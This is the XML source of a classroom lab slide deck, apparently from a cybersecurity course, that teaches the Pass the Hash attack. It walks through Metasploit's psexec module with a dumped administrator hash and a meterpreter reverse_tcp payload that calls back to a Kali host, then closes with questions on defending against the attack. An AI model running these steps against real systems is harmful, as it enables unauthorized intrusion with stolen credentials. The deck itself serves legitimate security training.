        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="John Queen" userId="S::john.queen@cyber.org::9145d1ed-b385-4b95-9df2-e4eecedea333" providerId="AD" clId="Web-{A52C7871-0E28-8C9D-63D7-78E969F60BCD}"/>
    <pc:docChg chg="addSld delSld">
      <pc:chgData name="John Queen" userId="S::john.queen@cyber.org::9145d1ed-b385-4b95-9df2-e4eecedea333" providerId="AD" clId="Web-{A52C7871-0E28-8C9D-63D7-78E969F60BCD}" dt="2020-04-08T16:04:26.847" v="1"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="add del">
        <pc:chgData name="John Queen" userId="S::john.queen@cyber.org::9145d1ed-b385-4b95-9df2-e4eecedea333" providerId="AD" clId="Web-{A52C7871-0E28-8C9D-63D7-78E969F60BCD}" dt="2020-04-08T16:04:26.847" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2615942091" sldId="608"/>
        </pc:sldMkLst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0976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1143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6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9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2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5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8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8001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4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Bank: Chase</a:t>
            </a:r>
          </a:p>
          <a:p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6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5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97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8526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3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7763-640B-47C0-8AF3-18F0E9797E6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C96-C8B6-438A-8B0D-F84BFF39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6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3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03DE2F-44C3-4FE9-A089-C5A2183181FF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Pass the Hash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854-C984-4173-AF32-C3E403ED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9FD9-9EEE-4872-82A7-63A6EE8C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34167"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start Metasploit with the following command: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msfconsole</a:t>
            </a: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A513D-44E8-4D4B-8894-34B80E5E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35" y="2993181"/>
            <a:ext cx="4741741" cy="11345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EEAB6B-7144-4D8E-AA86-0C0C09153F16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="2626303"/>
            <a:ext cx="3624685" cy="2143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400" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>You should notice that Metasploit console has started and you should now see:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial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97142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230F-B79C-4F2C-A759-AF0B26FC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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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6DC4-35AE-4962-99B2-8708F24C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5253990" cy="3875544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>Search for the exploit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2025" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>psexec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2025" b="1" dirty="0">
              <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t>Find where the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0" err="1"/>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t> exploit is located</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>Open the exploit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2025" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>use exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>psexec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2025" b="1" dirty="0">
              <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t>Check your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0" err="1"/>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t>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9FD73-6469-44EA-B8BE-BC70DCC6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90" y="3469376"/>
            <a:ext cx="3460802" cy="260148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91347-C4F2-4F34-A6BB-FFFE8F58ED9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2712824" y="5940573"/>
            <a:ext cx="1847461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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1125" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> exploit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C7524A-40EB-4125-9F31-02F18174383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636555" y="5455044"/>
            <a:ext cx="2248789" cy="48552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5E892F3-76F9-4C15-A51F-0D1CC471A931}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5931885" y="5286718"/>
            <a:ext cx="608823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361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9E9C-027D-4795-A90D-574C6841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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Exploit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955E-B68C-4E77-B02C-AA26C1E2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options for the exploit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show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What all do we need to enter?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RHOST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SMBUser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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SMBPass</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier" panose="020604090202050204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110E-C724-47EE-8360-37A4A225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67" y="3694153"/>
            <a:ext cx="4029911" cy="175961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98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SM-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>what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Server Message Block (SMB) is a network protocol for Windows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SMB is what allows Windows networks to see and share folders, print servers, and other network resources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SMB is a commonly exploited attack vector on Windows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used in the 2014 Sony Pictures attack and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WannaCry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ransomware attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typically needs a username and password to authenticate with.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once “in”, it can share other account details… as we’ll see.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2215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E0E5-6DDE-4F3F-8A77-39B32D37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SMBUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SMBPass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F54A-F10D-46D7-ADEA-8CF86C35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7"/>
            <a:ext cx="8286750" cy="536714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examine your password hashes from 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B7182-1AF7-4141-88BC-A0140B8FC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9593" r="-2334" b="-324"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1438220" y="2552102"/>
            <a:ext cx="4235620" cy="161302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70FB10-1452-4DD7-BEFE-458BF1C8A378}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5761777" y="2393673"/>
            <a:ext cx="3260303" cy="1364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92500" lnSpcReduction="1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6075" indent="-346075" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Pick the user with the most privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1025525" lvl="1" indent="-334963" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>Here, it should be “Administrator”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr hangingPunct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562AF-218C-41EC-B6FD-D94C57E01AA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632298" y="4382585"/>
            <a:ext cx="1847461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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Password Hash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40E5C-5A14-426E-BF12-7AC85744DC31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-290318" y="3217404"/>
            <a:ext cx="1847461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 err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SMBUser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125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42F9E4-7AD7-4F4A-9926-1BFE620BE05D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="676445" y="2859157"/>
            <a:ext cx="673838" cy="34561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66C4B82-7925-4E7F-ABC2-490D5AABC461}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1262347" y="2630963"/>
            <a:ext cx="1230572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935B8-61AB-44C8-A144-62C3DE686357}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5324670" y="3902132"/>
            <a:ext cx="1847461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 err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SMBPass</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125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6F5E7-8A72-4222-A683-F974D8590529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3556029" y="2859156"/>
            <a:ext cx="2601884" cy="104297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E8CFC1-FCD6-4961-81D6-7565395F9416}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2657475" y="2846525"/>
            <a:ext cx="2878932" cy="0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F19E07-BE4B-40E6-81D6-8923D706AA20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1438220" y="2951683"/>
            <a:ext cx="1505006" cy="27262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2304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B209-AC55-4E08-A190-91A11CE0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psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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5C2F-CB54-49E3-A63B-B9EFFC0A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RHOST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set RHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250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  <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Windows_IP_address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Set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SMBPass</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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set SMBPASS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025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  <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Windows_SMBPass</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2025" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SMBUser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lvl="1">
              <a:buNone/>
            </a:pPr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  <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>set SMBUSER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  <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Windows_SMBUser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" panose="020604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4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DA0E-7FA8-4B8F-B5D9-9B336B9F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7BEB-A76B-46A9-9185-C1503DFC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payload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reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set PAYLOAD windows/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Show the options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>show options</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>We need to set the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LHOST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LPORT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6F23A-00B5-4052-8E56-B17D545A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90" y="4079852"/>
            <a:ext cx="5881792" cy="47138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7FAE7-3222-47B0-AF56-838E3718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617" y="4744357"/>
            <a:ext cx="4615491" cy="130718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63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C728-0525-49F7-A800-07E3C65F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Payload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7C9B-9734-48E9-8510-45FDF37B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519" y="2135012"/>
            <a:ext cx="4690504" cy="3667539"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set the LHOST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set LHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025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  <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Kali_IP_address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Set the LPORT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set LPORT 1717</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check all the options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show options</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure everything is correct!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F4033-B0A6-48BD-96FD-B9C838A6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5417"/>
            <a:ext cx="4066187" cy="595801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C3684-3C11-42A9-871C-89307E1F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74" y="2135012"/>
            <a:ext cx="2931946" cy="258797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64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4A2B-6FD9-43BB-BA97-61C42197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the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5C83-0036-44E6-BDFA-05B4B025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6418"/>
            <a:ext cx="8286750" cy="3658533"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the run command to run the attack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run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look at the credentials: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getuid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>Who are you logged in as?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Notice, you have logged in using only the password hash!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46F93-E999-437A-88F3-789CA63E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848" y="32925"/>
            <a:ext cx="3788152" cy="162349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AADE6-ADEC-4500-8507-342F6B88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68" y="2466829"/>
            <a:ext cx="4363332" cy="1626164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79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910E84-AFB4-44EA-BB6A-BE5B6FBC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3750" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to Defend Against a Pass the Hash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705D-DDC3-4FDE-84E5-E99E71AC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1663"/>
            <a:ext cx="8286750" cy="3488012"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Very hard to defend against once hashes are compromised</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How were you able to gain access to the hashes?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How can you protect your hashes?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not use the same admin passwords on different stations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why is it dangerous to use the same admin log-in of different workstations?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How else can you defend against a pass the hash attack?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38440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the Hash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lab, you will gain access to an administrator account simply by knowing the hashed password of the account</a:t>
            </a:r>
          </a:p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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software Tools used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit Framework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you have explored and understand </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>the following labs.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This lab makes use of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privilege Escalation Lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Backdoor/Trojan 2 Lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="111426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lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Objective 1.2 – Compare and Contrast types of attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application/Service Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pass the Hash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5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Pass the Hash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217670" cy="3855224"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A Pass the Hash attack is when a person gains access to a system using a hashed password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The attacker does not need to know the unencrypted, plaintext password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Why is this dangerous?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Why must a person or organization protect their password hashes?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DAAFA-2CCE-446B-AB4B-48C3FE73B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2253943"/>
            <a:ext cx="4101602" cy="175782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Pass the Hash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4742"/>
            <a:ext cx="6341110" cy="39030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Setup Environments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find the Necessary Information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initialize Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examine the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SMBUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SMBPass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psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set the Payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set Payload Options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pass the Hash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82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Necessary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1692136"/>
            <a:ext cx="8114348" cy="4099064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find the IP Address of Kali and Windows​</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" rtl="0" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write these down​</a:t>
            </a:r>
          </a:p>
          <a:p>
